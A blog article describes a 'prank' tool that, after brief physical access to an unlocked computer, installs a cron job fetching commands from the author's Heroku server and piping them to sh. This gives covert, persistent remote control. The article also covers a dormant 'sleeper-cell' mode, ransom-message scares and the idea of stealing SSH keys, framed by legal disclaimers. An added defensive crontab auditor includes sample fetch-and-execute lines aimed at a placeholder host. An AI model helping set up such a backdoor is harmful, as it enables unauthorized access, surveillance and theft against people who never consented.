Hacking My Friends’ Roblox Account

by Chet Corcos

My friends often leave their computers open and unlocked. I tell them they should probably get in the habit of locking their computers, but they don’t listen to me. So I’ve created a simple project to hack my friends and show them the importance of computer security.

All I need to do is wait for them to leave their computer unlocked for a few seconds, open up their terminal, and type a single, short command.

That’s it! Their computer is now infected and I can run whatever commands I want on this computer remotely. Pretty sweet, right? Or perhaps shocking?

Hacking is illegal. Specifically:

“intentionally access[ing] a computer without authorization or exceed[ing] authorized access” — The Computer Fraud and Abuse Act (18 U.S.C. 1030)

So keep in mind that the purpose of this article is to show you just how easy it would be for someone with bad intentions to hack you so you can avoid getting hacked yourself.

It doesn’t take some hacker genius to wreck your life — any “script kiddy” who can gain physical access to your computer can compromise you by downloading a script containing just 50 lines of code.

Getting Set Up

All of the code for this project lives in this repository if you want to jump right in, but I’ll explain how it all works below.

First, you just need to clone the repo, install its dependencies, and symlink the hack command line interface (CLI) tool.

Next, you need to set up Heroku to host the scripts that will be running on your friend’s machine. If you’ve never used Heroku before, sign up here (it’s free!) and set up their CLI tool on your machine.

Now inside the hack repo, create a Heroku app with an easy name to remember. I’m using hacker-chet.

Then you need to run a command to do a little setup. All it’s really doing is getting the root URL for your Heroku website and putting it in your package.json. This way the server can inject the app URL into the shell scripts.

You can start up the server locally if you want to hack yourself and test things out.

Or you can deploy to Heroku.

Now you’re ready to hack!

Hack API

The beauty of this program is that to start hacking someone, you just need to run a single command on their machine.

ROOT_URL is the specific path to your application. When you’re running the server locally, this will be localhost:5000 and when you deploy to Heroku, it will be something like <APP_NAME>.herokuapp.com.

This sets up a cron job — a “chronological job” that reruns tasks at certain times — to ping the /env/live endpoint every minute and pipe the result to sh. It’s actually quite simple! And Heroku gives you HTTPS for free, so it’s “secure,” right?

Once you’ve hacked your friend, you can do everything else with the command line tool from your computer.

The hack tool has a concept of different hacked environments. When you hack someone using the /hack endpoint, that person starts off in the live environment. And for each environment, you can run a variety of different commands. I’ll demonstrate everything with a little walkthrough.

The following rewrites the live environment shell script to execute a command that says aloud “I’m watching you.”

Well, it’s not going to work yet; you still have to re-deploy to your Heroku app.

Now wait for the next minute and watch your friend’s computer ping your server by tailing the server logs.

The whole point of environments is so you can hack multiple people at the same time. To isolate people in different environments, you just need to change the name.

Next time the live environment is pinged, it will rewrite the cron job to start pinging the jon environment instead.

You can do everything the same just by changing the environment argument.

Now if you’ve had enough fun for the day and the party’s over, you can forget Jon and assure him that you’ve “unhacked” him.

This will erase the cron job from their computer. Or you might want to just put this environment in sleeper-cell mode so you can recover it later.

Now, rather than pinging your server every minute (the default), it will ping every day at midnight. And when you want to wake it back up, you can change the interval back to every minute and the next day, you’re good to go!
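From the defender's side, the persistence described above is a crontab entry that fetches a script and hands it to a shell, whether it fires every minute or once a day at midnight. The audit below is an added example, not code from this article or its repository; it assumes the fetcher is curl or wget, and the sample crontab with its example.invalid URLs is constructed.

```python
import re

# Cron macros that stand in for the five time fields.
MACROS = {"@reboot", "@yearly", "@annually", "@monthly", "@weekly",
          "@daily", "@midnight", "@hourly"}
# A download tool whose output is piped straight into an interpreter.
FETCH_PIPE = re.compile(
    r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?"
    r"(sh|bash|zsh|dash|ksh|python[\d.]*|perl|ruby)\b")
# Same effect without a pipe: sh -c "$(curl ...)" or bash <(curl ...).
FETCH_SUBST = re.compile(r"\b(sh|bash|zsh)\b[^|;&]*(\$\(|<\(|`)\s*(curl|wget)\b")
ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")

def parse_entry(line):
    """Return (schedule, command) for a user-crontab line, else None."""
    line = line.strip()
    if not line or line.startswith("#") or ENV_LINE.match(line):
        return None
    parts = line.split(None, 1)
    if parts[0] in MACROS:
        return (parts[0], parts[1]) if len(parts) == 2 else None
    fields = line.split(None, 5)
    return (" ".join(fields[:5]), fields[5]) if len(fields) == 6 else None

def audit_crontab(text):
    """List entries that download remote content and execute it."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        entry = parse_entry(raw)
        # The schedule is reported, not used for the verdict: an entry
        # that runs once a day is as dangerous as one that runs each minute.
        if entry and (FETCH_PIPE.search(entry[1]) or FETCH_SUBST.search(entry[1])):
            findings.append({"line": lineno, "schedule": entry[0],
                             "command": entry[1]})
    return findings

# Constructed sample crontab (example.invalid is a placeholder host).
SAMPLE = """\
# m h dom mon dow command
MAILTO=""
* * * * * curl -s https://example.invalid/env/live | sh
0 0 * * * wget -qO- https://example.invalid/env/jon | bash
30 2 * * 0 /usr/local/bin/backup.sh
@reboot bash -c "$(curl -fsSL https://example.invalid/boot)"
15 3 * * * curl -s -o /tmp/report.json https://example.invalid/report
"""

if __name__ == "__main__":
    for f in audit_crontab(SAMPLE):
        print(f"line {f['line']} [{f['schedule']}] {f['command']}")
```

On a real machine, pass it the output of `crontab -l` for each user account; a plain download to a file (the last sample line) is deliberately not flagged.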

Some other fun things to do are setting up additional cron jobs. Here’s how you can wake your friend up at 6am every morning to remind him about computer security.

P.S. If you don’t remember how cron jobs work, this is a great resource. It pretty much all comes down to this little diagram.

One of my favorites is the desktop preset which will download an image from a given URL and set it as the background photo.

And if you’ve written a ton of cron jobs and you don’t know what’s on there anymore, you can use the dump command.

Now whip open your logs and you’ll see the output on the next ping. This is actually much more sinister now that you can get information back. If you wanted to be more nefarious, you could search for decrypted passwords or steal their SSH keys.

But if you just want to give him a good old-fashioned scare, send him a ransom message!

Lastly, if you find yourself adding a bunch of cron jobs and just want to start over, reset is here to help.

Now go have (responsible) fun with this thing and let me know what your favorite pranks are by submitting a pull request with a new command or preset!

Happy Hacking!